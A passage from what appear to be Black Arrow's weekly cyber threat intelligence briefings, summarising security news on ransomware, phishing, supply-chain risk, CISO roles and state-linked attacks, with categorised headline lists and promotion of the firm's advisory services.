We also explore the shifting role of the CISO, now increasingly embedded in strategic business leadership. As AI becomes more integrated into operations, CISOs must balance innovation with governance, mastering risk management to promote responsible adoption. The rise of fractional CISOs offers small and medium firms access to broad expertise at lower cost, which we provide for our clients. Threat actors continue to evolve, with ransomware groups like Play expanding their reach, and teenage hackers blurring the line between mischief and organised crime.
The UK’s Ministry of Defence has disclosed a thwarted spear-phishing campaign by Russia-linked actors posing as journalists, part of over 90,000 state-linked threats in two years. This highlights the growing use of cyber operations in geopolitical conflict. Finally, the unmonitored use of generative AI tools is accelerating, raising concerns about data loss and regulatory breaches. Black Arrow recommends that leaders prioritise visibility across supply chains, invest in adaptive security training by experts, and align AI and threat intelligence strategies with robust governance frameworks.
Top Cyber Stories of the Last Week
Half of Firms Suffer Two Supply Chain Incidents in Past Year
New research reveals that nearly half of UK organisations have faced two or more supply chain-related cyber incidents in the past year, highlighting growing concerns over third-party vulnerabilities. Despite 90% identifying supply chain threats as a top priority for 2025, only 37% felt their current risk management strategies were truly effective. The report points to poor collaboration between stakeholders and inconsistent visibility across sectors, with just 14% of organisations having full visibility into all supply chain tiers. As the UK prepares to introduce new cyber resilience legislation, firms are calling for stronger regulatory powers and incentives to drive better cross-industry coordination.
https://www.infosecurity-magazine.com/news/half-supply-chain-incidents/
Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA
New research shows that Vendor Email Compromise (VEC) attacks are now outpacing traditional Business Email Compromise (BEC) across EMEA, with nearly half of recipients engaging with VEC emails, almost double the rate of BEC. VEC exploits trust in external vendors, making it harder to detect and rarely reported by users. With reporting rates as low as 0.2% in EMEA, these scams pose a growing challenge. The findings highlight the need for enhanced email security platforms, third-party behaviour monitoring, and targeted user education to better defend against increasingly sophisticated impersonation threats.
https://www.msspalert.com/brief/vec-attacks-outpace-bec-in-emea-a-growing-challenge-for-mssps
UK SMBs Are Ramping Up Cyber Security Spending
Over half of UK small businesses increased their cyber security spending last year. Phishing, ransomware, and denial-of-service attacks remain key risks. Meanwhile, growing interest in generative AI is prompting fresh concerns around data protection, regulatory uncertainty, and staff readiness, with many SMBs expressing caution over privacy, reliability, and the potential loss of personalised service.
https://www.itpro.com/security/uk-smbs-are-ramping-up-cybersecurity-spending-and-its-about-time
CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
The role of the Chief Information Security Officer (CISO) is undergoing a strategic shift, moving beyond technical oversight to encompass broader business responsibilities including risk management, IT, and digital transformation. Nearly 40% of CISOs now hold senior executive titles, with over half engaging regularly with boards, rising to 65% in large enterprises. Research shows three clear CISO types: Strategic, Functional, and Tactical, with Strategic CISOs earning significantly higher compensation and reporting the greatest job satisfaction. This transformation reflects growing recognition that effective cyber security leadership is now integral to overall business success and long-term resilience. A good outsourced fractional CISO with cost-effective expertise across Strategic, Functional, and Tactical, can benefit organisations with fewer resources, often providing a much wider range of skills and experience than available from an individual.
https://cybersecuritynews.com/ciso-roles-expand-beyond-cybersecurity/
CISO 3.0: Leading AI Governance and Security in the Boardroom
CISOs are evolving into strategic advisors as AI becomes embedded across business operations, with 85% of IT leaders believing AI can enhance cyber security. However, practical challenges persist around system visibility, false positives, and integration with legacy infrastructure. To govern AI effectively, CISOs must gain fluency in data science and risk modelling, ensuring AI tools are explainable and accountable. Building a security culture that embraces AI starts with education, using adaptive and immersive training to close skills gaps. Successful adoption hinges on choosing trustworthy vendors and aligning tools with governance frameworks and business needs.
https://www.helpnetsecurity.com/2025/06/02/aaron-mccray-cdw-cisos-ai-security/
Play Ransomware Breached 900 Victims, Including Critical Orgs
The Play ransomware group has now impacted around 900 organisations globally, including critical infrastructure, marking a threefold increase in victims since late 2023. Active since 2022, the group is known for stealing sensitive data before encrypting systems, using email for extortion rather than dark web platforms. Their attacks are made harder to detect by constantly altering their malware and exploiting known software flaws. Authorities urge organisations to keep systems updated, use multifactor authentication on key services, and ensure offline backups and recovery plans are in place to mitigate the growing risk of ransomware attacks.
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Cowbell’s latest report highlights a sharp rise in cyber claims, driven by increasingly sophisticated attacks. Ransomware remains a consistent threat, making up nearly one in five claims. The most damaging incidents stemmed from just five criminal groups, often exploiting basic weaknesses like unpatched systems or misconfigured email. Phishing continues to be the top entry point for wider breaches and fraud. Professional services, healthcare, education, construction and manufacturing were the most targeted, underscoring the growing impact of cyber attacks on sectors reliant on sensitive data and operational continuity.
https://www.claimsjournal.com/news/national/2025/06/06/330974.htm
Role of Threat Intelligence in Proactive Defence Strategies
Organisations are increasingly shifting from reactive to proactive cyber security strategies, with threat intelligence now central to anticipating and preventing attacks. By integrating strategic, operational, and technical insights into existing defences, businesses are improving detection speeds and reducing attack success rates by over 97%. The use of real-time threat data, predictive analytics, and advanced threat hunting helps organisations detect adversaries earlier and act faster. With the average breach costing nearly USD 4.9 million, the economic case for investing in threat intelligence is growing, offering both financial resilience and enhanced protection in a rapidly evolving threat landscape.
https://cybersecuritynews.com/threat-intelligence-3/
Beware GenAI Use is Outpacing Security Controls
Palo Alto Networks has found that employees in every organisation are now using an average of 6.6 high-risk generative AI tools, often without the knowledge of security teams. In some firms, over 60 different AI applications are present in the environment, with writing assistants and chatbots being the most common. Alarmingly, incidents involving data loss linked to these tools have more than doubled in the past year. Experts warn that without clear policies and real-time monitoring, organisations risk data leaks, regulatory breaches, and even reward the misuse of shadow AI through unintentional incentives for output quality.
https://www.csoonline.com/article/4002103/cisos-beware-genai-use-is-outpacing-security-controls.html
Why Teenage Hackers Pose More Danger Than Ever
Recent high-profile cyber attacks on UK retailers such as M&S and Co-op have exposed a growing and alarming trend: many of these incidents are not the work of overseas state-backed groups, but of teenage hackers operating from bedrooms in the UK and US. Often meeting online through chat forums, these individuals, sometimes referred to as collectives like Scattered Spider, launch attacks for thrill, money, and status. This new generation of hackers combines social manipulation techniques with access to professional criminal tools, blurring the line between youthful mischief and serious organised crime. Tackling this rising threat requires a shift in how we understand and deter cyber crime.
‘Nation States don’t do hacking for fun’ UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy
The UK National Cyber Security Centre (NCSC) has warned that nation states are increasingly using cyber attacks as tools of sabotage and espionage, often targeting supply chains and critical infrastructure. Russia’s offensive cyber capabilities have advanced significantly, with recent attacks timed to coincide with military operations, while China is believed to be embedding threat groups within key systems to prepare for possible future conflict. The NCSC urged businesses to understand how global geopolitical tensions intersect with their own cyber risk exposure. Despite this, financially motivated cyber criminals remain the most common threat, with many incidents causing unintended collateral damage to private firms.
Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence
The UK’s Ministry of Defence has disclosed a sophisticated cyber attack attempt by Russia-linked hackers posing as journalists in a spear phishing campaign dubbed “Damascened Peacock”. The attackers aimed to deploy malware through deceptive emails disguised as urgent media or financial requests. Although the attack was thwarted, it is part of over 90,000 state-linked cyber threats against UK defence in the past two years. The malware used was new and linked to a known Russian group previously active in targeting military and government entities across the West. The UK is now investing in stronger cyber capabilities to counter such threats.
Governance, Risk and Compliance
CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
CISO 3.0: Leading AI governance and security in the boardroom - Help Net Security
CISO Stature Rises, but Budgets Remain Tight
UK SMBs are ramping up cyber security spending – and it’s about time | IT Pro
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
Building a Cyber-Resilient Organisation CISOs Roadmap
Is Your CISO Navigating Your Flight Path?
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
Breaking Down Silos Aligning IT and Security Teams
Cyber security top investment priority with tech leaders
Are you cyber resilient? Five traits that define the leaders of 2025 | SC Media
Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly
Creating the right organisational culture for cyber security - NCSC.GOV.UK
6 hard truths security pros must learn to live with | CSO Online
Why hacking yourself first is essential for proactive cyber security | TechRadar
From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK
What Is Cyber Threat Intelligence: Quick Guide For CISOs
Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly
53% of cyber department leaders eyeing the exit | CSO Online
Cyber security Needs Satellite Navigation, Not Paper Maps - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
FBI: Play ransomware breached 900 victims, including critical orgs
Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
6 rising malware trends every security pro should know | CSO Online
Scattered Spider: Three things the news doesn’t tell you
Play ransomware groups use SimpleHelp flaw: FBI • The Register
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Mysterious leaker outs Conti ransomware kingpins • The Register
Interlock ransomware: what you need to know | Tripwire
Cops in Germany Claim They’ve ID’d the Mysterious Trickbot Ransomware Kingpin | WIRED
New ChatGPT Scam Infects Users With Ransomware: ‘Exercise Extreme Caution’
When ransomware listings create confusion as to who the victim was – DataBreaches.Net
Cyber attacks: What do hackers do with your data?
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews
Ransomware and USB attacks are hammering OT systems - Help Net Security
Ransomware Victims
FBI: Play ransomware breached 900 victims, including critical orgs
Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks
M&S hackers sent abuse and ransom demand directly to CEO - BBC News
Volkswagen investigates hacker data breach claims | Cybernews
Victoria's Secret Says It Will Postpone Earnings Report After Recent Security Breach - SecurityWeek
Interlock ransomware claims Kettering Health breach, leaks stolen data
A cyber attack hit hospitals operated by Covenant Health
Next beefs up customer security amid retail hacking crisis - UKTN
Phishing & Email Based Attacks
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register
Phishing Campaign Uses Fake Booking.com Emails to Deliver Malware - Infosecurity Magazine
VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert
Cyber attacks: What do hackers do with your data?
Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register
Beware of Device Code Phishing
Where Did The Name 'Phishing' Come From?
Business Email Compromise (BEC)/Email Account Compromise (EAC)
VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert
Other Social Engineering
Beware of Device Code Phishing
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
Thwart nation-state threat actors with these CISO tips | TechTarget
Vishing Crew Targets Salesforce Data
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek
Fraud, Scams and Financial Crime
Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register
FBI Warns of Filipino Tech Company Running Crypto Scams
Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek
Law enforcement seized the carding marketplace BidenCash
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
Google survey shows Americans are changing how they fight scams - Help Net Security
Scammer Reported To FBI & Cyber Crime Agency After Conning TV Writers
Airbnb scams: new book explores thriving criminal activity on big tech platforms
Artificial Intelligence
Vibe coding is here to stay. Can it ever be secure? | CyberScoop
CISOs beware: genAI use is outpacing security controls | CSO Online
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly
The hidden security risks of open source AI | Computer Weekly
AI Emerges as the Top Concern for Security Leaders | Security Magazine
Combatting the Threat of AI Misuse | SC Media UK
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED
96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET
Companies Are Discovering a Grim Problem With "Vibe Coding"
The security debt of browsing AI agents | TechRadar
Researchers Bypass Deepfake Detection With Replay Attacks
AI agents make great teammates, but don't let them code alone - here's why | ZDNET
2FA/MFA
Malware
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
6 rising malware trends every security pro should know | CSO Online
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine
Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
New versions of Chaos RAT target Windows and Linux systems
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek
Backdoored Open Source Malware Repositories Target Novice Cyber Criminals - SecurityWeek
US offers $10M for tips on state hackers tied to RedLine malware
Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware
Hacker targets other hackers and gamers with backdoored GitHub code
Mobile
Android banking trojan Crocodilus rapidly evolves and goes global
FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe
Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop
Android malware trends: Stealthier, easier-to-use | Intel 471
Beware of Device Code Phishing
Denial of Service/DoS/DDoS
Major DDoS attack disrupts Moscow’s internet services | SC Media
Internet of Things – IoT
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent
Data Breaches/Leaks
ConnectWise Breached, ScreenConnect Customers Targeted
Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register
Volkswagen investigates hacker data breach claims | Cybernews
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Cartier discloses data breach amid fashion brand cyber attacks
The North Face warns customers of April credential stuffing attack
Hackers Leak 86 Million AT&T Records with Decrypted SSNs
Organised Crime & Criminal Actors
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
Why teenage hackers pose more danger than ever
Websites selling hacking tools to cyber criminals seized – DataBreaches.Net
US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation
How global collaboration is hitting cyber criminals where it hurts - Help Net Security
Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly
Cyber attacks: What do hackers do with your data?
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
FBI Warns of Filipino Tech Company Running Crypto Scams
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
BitMEX discovers cybersecurity lapses in North Korea hacker group
The US government is now a bitcoin whale. That has consequences | American Banker
Insider Risk and Insider Threats
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
FBI arrests DoD IT worker, claim he tried to leak intel • The Register
Thwart nation-state threat actors with these CISO tips | TechTarget
Insurance
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Companies Looking to Cyber Liability Insurance
Supply Chain and Third Parties
ConnectWise Breached, ScreenConnect Customers Targeted
Play ransomware groups use SimpleHelp flaw: FBI • The Register
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
Half of Firms Suffer Two Supply Chain Incidents in Past Year - Infosecurity Magazine
Outages
SentinelOne: Last week’s 7-hour outage caused by software flaw
Identity and Access Management
Don’t let dormant accounts become a doorway for cyber criminals
Encryption
FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe
MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek
Inside The Coming Quantum Crisis: Why CEOs Must Prepare For Q-Day Now
The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation
Linux and Open Source
Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine
New versions of Chaos RAT target Windows and Linux systems
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Passwords, Credential Stuffing & Brute Force Attacks
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Account Lockout Policy: Setup and Best Practices Explained | TechTarget
Don’t let dormant accounts become a doorway for cyber criminals
Social Media
Meta is now a defence contractor • The Register
Training, Education and Awareness
Building a Scalable Cyber Security Training Program
Regulations, Fines and Legislation
Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine
The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine
Vodafone Germany Fined $51 Million Over Privacy, Security Failures - SecurityWeek
Data watchdog put cops on naughty step for lost CCTV footage • The Register
US Banks Seek to Limit Cyber Attack Disclosures
Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop
Slashing CISA Is a Gift to Our Adversaries
The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation
Trump's Cyber Pick Vows Interagency Cooperation if Confirmed
Senator hounds Trump’s cyber pick over CISA cuts • The Register
Models, Frameworks and Standards
The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine
MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek
Data Protection
Data watchdog put cops on naughty step for lost CCTV footage • The Register
Careers, Working in Cyber and Information Security
CIOs get serious about closing the skills gap — mainly from within | CIO
PTSD Resolution and CIISec to offer therapy to cyber workers
53% of cyber department leaders eyeing the exit | CSO Online
Law Enforcement Action and Take Downs
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
Websites selling hacking tools to cyber criminals seized – DataBreaches.Net
US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation
How global collaboration is hitting cyber criminals where it hurts - Help Net Security
Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
UK CyberEM Command to spearhead new era of armed conflict • The Register
The UK Brings Cyberwarfare Out of the Closet - SecurityWeek
Nation State Actors
Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek
Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?
China
China accuses Taiwan and the US of being feeble hackers • The Register
Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent
Russia
Damascened Peacock: Russian hackers targeted UK Ministry of Defence
Russian hybrid warfare: Ukraine's success offers lessons for Europe - Atlantic Council
Ukraine's enduring cyber defence: Assessing resilience and impact of shifting international support
US offers $10M for tips on state hackers tied to RedLine malware
Russian hackers target Greek company | Ukrainska Pravda
Ukraine takes second strike at Russians with Tupolev hack • The Register
Major DDoS attack disrupts Moscow’s internet services | SC Media
Moscow Poses No Threat to Britain, Says Russia's UK Embassy
Iran
Iranian APT 'BladedFeline' Hides in Network for 8 Years
North Korea
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
BitMEX discovers cyber security lapses in North Korea hacker group
Tools and Controls
What Is Cyber Threat Intelligence: Quick Guide For CISOs
Vibe coding is here to stay. Can it ever be secure? | CyberScoop
Companies Are Discovering a Grim Problem With "Vibe Coding"
From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK
Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE
Role of Threat Intelligence in Proactive Defence Strategies
Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek
Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?
Play ransomware groups use SimpleHelp flaw: FBI • The Register
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED
AI agents make great teammates, but don't let them code alone - here's why | ZDNET
CISO Stature Rises, but Budgets Remain Tight
Building a Cyber-Resilient Organisation CISOs Roadmap
Cyber security top investment priority with tech leaders
Why hacking yourself first is essential for proactive cyber security | TechRadar
Beyond the Broken Wall: Why the Security Perimeter Is Not Enough
A comprehensive new guide to today’s hazards | UNDRR
CISOs need better tools to turn risk into action - Help Net Security
Account Lockout Policy: Setup and Best Practices Explained | TechTarget
Don’t let dormant accounts become a doorway for cyber criminals
96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET
Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek
48% of security pros are falling behind compliance requirements - Help Net Security
Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware
Researchers Bypass Deepfake Detection With Replay Attacks
Agentic AI and the risks of unpredictable autonomy - Help Net Security
DNS Hijacking, A Major Cyber Threat for the UK Government - Infosecurity Magazine
Other News
A comprehensive new guide to today’s hazards | UNDRR
Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE
Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks
Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly
UK Defence Review: “Making Britain safer/secure at home, and strong abroad” - EDR Magazine
New spying claims emerge in Silicon Valley corporate espionage scandal
Danish energy sector probes removes concerns about solar involvement – pv magazine International
Cyber Security Needs Satellite Navigation, Not Paper Maps - Security Boulevard
Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews
CISOs Guide to Navigating the 2025 Threat Landscape
The Secret Defence Strategy of Four Critical Industries Combating Advanced Cyber Threats
Vulnerability Management
Filling the Gap with the European Vulnerability Database
Future-ready cyber security: Lessons from the MITRE CVE crisis | CyberScoop
Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop
Slashing CISA Is a Gift to Our Adversaries
Seven Steps to Building a Mature Vulnerability Management Program - Infosecurity Magazine
Vulnerabilities
Technical Details Published for Critical Cisco IOS XE Vulnerability - SecurityWeek
Two Linux flaws can lead to the disclosure of sensitive data
SentinelOne: Last week’s 7-hour outage caused by software flaw
Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop
New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch
Microsoft ships emergency patch to fix Windows 11 startup failures
Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code
Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI
Questions Swirl Around ConnectWise Flaw Used in Attacks
Hackers are exploiting critical flaw in vBulletin forum software
Qualcomm Fixes 3 Zero-Days Used in Targeted Android Attacks via Adreno GPU
vBulletin Vulnerability Exploited in the Wild - SecurityWeek
HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass
Why SAP security updates are a struggle for large enterprises - Help Net Security
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 30 May 2025
Black Arrow Cyber Threat Intelligence Briefing 30 May 2025:
-New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware
-The Hidden Cyber Risks in Your Executive Team’s Digital Footprint
-Mandatory Ransomware Payment Disclosure Begins in Australia
-Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW
-Cyber Security Teams Generate Average of $36M in Business Growth
-M&S Boss: I Went into Shock over Cyber Attack
-Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware
-AI Is Perfecting Scam Emails, Making Phishing Hard to Catch
-4.5% of Breaches Now Extend to Fourth Parties
-Any Teenager Can Be a Cyber Attacker Now, Parents Warned
-New Russian State Hacking Group Hits Europe and North America
-DragonForce Engages in "Turf War" for Ransomware Dominance
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week’s review highlights the growing risks facing senior executives, with threat actors increasingly targeting C-suite leaders through tailored spear-phishing campaigns and exploiting their digital footprints. A recent study reports cyber risk as the top reputational concern for senior leaders globally, yet most organisations remain unprepared to model the business impact of such events, while the CEO of M&S highlights the personal effects of experiencing a cyber attack. By contrast, we report on a study that has assessed the business value of including cyber security at the outset of business initiatives.
We also report on the evolution of attack tactics, including disguising ransomware and malware as legitimate AI tools, and enabling teenagers with limited technical skills to conduct attacks. The cyber threat landscape remains volatile, with criminal groups exploiting AI hype, expanding supply chain attack vectors, and even competing for dominance amongst their peers.
Finally, Australia now requires companies to report ransomware payments, which we see as part of a growing drive for transparency that builds on current and forthcoming legislation in other jurisdictions.
Black Arrow recommends that business leaders should ensure they perform an objective assessment of their cyber risks, and address those risks through controls across people, operations and technology aligned to a respected framework underpinned by robust governance.
Top Cyber Stories of the Last Week
New Spear-Phishing Attack Targeting Financial Executives by Deploying Malware
A new spear-phishing (highly targeted/individualised phishing) campaign is actively targeting chief financial officers and senior executives in the banking, energy, insurance, and investment sectors across multiple regions, including the UK. The operation impersonates recruitment outreach from a well-known financial firm and uses convincing social engineering to bypass standard security training. The attackers deploy a legitimate remote access tool, blending into normal network activity and complicating detection. The use of custom CAPTCHA and hidden download mechanisms highlights the operation’s sophistication. The campaign’s precise targeting and persistence tactics reflect a well-resourced threat actor likely pursuing long-term strategic access.
https://cybersecuritynews.com/new-spear-phishing-attack-targeting-financial-executives/
The Hidden Cyber Risks in Your Executive Team’s Digital Footprint
Executives and board members are increasingly targeted by cyber criminals due to their extensive digital footprints and access to high-value systems. Public profiles, reused passwords, and personal device use create opportunities for attackers to launch tailored phishing, impersonation, and deepfake scams. Infostealers harvesting login details and cookies from executive endpoints are now sold on dark web markets, sometimes with corporate credentials priced as low as $100. These risks go beyond technical flaws, exposing organisations to reputational and operational damage. Proactive monitoring of executive identities and digital exposure is now critical to reducing breach likelihood and maintaining cyber resilience.
Mandatory Ransomware Payment Disclosure Begins in Australia
Australia has become the first country to mandate the reporting of ransomware payments, requiring private organisations with turnover above AUD $3m to notify authorities within 72 hours of making or learning of a payment. The new measures aim to improve visibility into cyber crime and reduce underreporting, with research showing only one in five victims currently alert authorities. The law also introduces a Cyber Incident Review Board and forthcoming smart device security standards. With global momentum growing, the UK is now consulting on similar ransomware reporting and payment restrictions for critical infrastructure and public sector entities.
https://www.infosecurity-magazine.com/news/ransomware-payment-disclosure/
Cyber is Now the Top Reputational Risk for Global Firms for 2024/25 per WTW
WTW’s latest global survey has found that cyber risk is now the top reputational concern for senior executives, cited by 65% of respondents up from 52% last year. Environmental and governance risks also rose significantly, reflecting growing regulatory pressures. While 94% of organisations now reserve budgets for managing reputational damage, only 11% feel confident in modelling the financial impact of such events. Encouragingly, most firms have formal crisis response teams and conduct regular scenario testing, but the gap between preparedness and risk quantification remains a key challenge for leadership to address in today’s volatile threat landscape.
Cyber Security Teams Generate Average of $36M in Business Growth
An EY global study has found that cyber security teams contribute a median of $36 million in business value per enterprise initiative, yet budget allocations have halved as a percentage of revenue over the past two years. Despite their growing strategic role, only 13% of CISOs are engaged early in key business decisions. The report highlights that when involved from the outset, security leaders accelerate innovation, reduce risk, and strengthen customer trust particularly in AI adoption and market expansion. Organisations recognising this are seeing both enhanced resilience and competitive advantage through secure, business-aligned transformation.
https://www.infosecurity-magazine.com/news/cybersecurity-teams-business-growth/
M&S Boss: I Went into Shock over Cyber Attack
The chief executive of UK retailer Marks & Spencer (M&S) described feeling “in shock” as the company faced a ransomware cyber attack that disrupted payments, digital stock systems and online sales, with losses estimated at £300 million. The incident exposed personal data belonging to staff and millions of customers, prompting warnings about scams and reinforcing the reputational impact. The attack, attributed to human error, highlighted the persistent difficulty in defending against ransomware. The crisis has accelerated M&S’ digital infrastructure overhaul, reducing a planned three-year transformation to just 18 months.
https://www.telegraph.co.uk/business/2025/05/25/ms-boss-i-went-into-shock-over-cyber-attack/
Cyber Criminals Exploit AI Hype to Spread Ransomware, Malware
Cyber criminals are increasingly exploiting public interest in artificial intelligence by disguising ransomware and malware as legitimate AI tools. Recent campaigns have used fake websites and malicious installers claiming to offer free AI services to lure users into downloading harmful software. Victims are targeted through manipulated search engine results and deceptive advertisements. Once installed, these payloads can encrypt data, corrupt systems, or render devices inoperable. Notably, attackers are blending legitimate AI components with malware to evade detection. Organisations are advised to source AI tools only from verified providers and avoid downloading from promoted links or unofficial platforms.
AI Is Perfecting Scam Emails, Making Phishing Hard to Catch
AI-driven tools are transforming phishing scams, making fraudulent emails far harder to detect. Unlike earlier scams with poor grammar and awkward phrasing, messages now appear polished and convincingly mimic trusted brands and individuals, even in niche languages like Icelandic. The FBI estimates email and impersonation frauds generated $16.6 billion last year. Attackers can now rapidly customise scams at scale, embedding into real threads and exploiting lookalike domains. Experts warn traditional awareness training is no longer enough; verifying suspicious messages and using measures like multifactor authentication and password managers are increasingly essential for defence.
https://www.axios.com/2025/05/27/chatgpt-phishing-emails-scam-fraud
4.5% of Breaches Now Extend to Fourth Parties
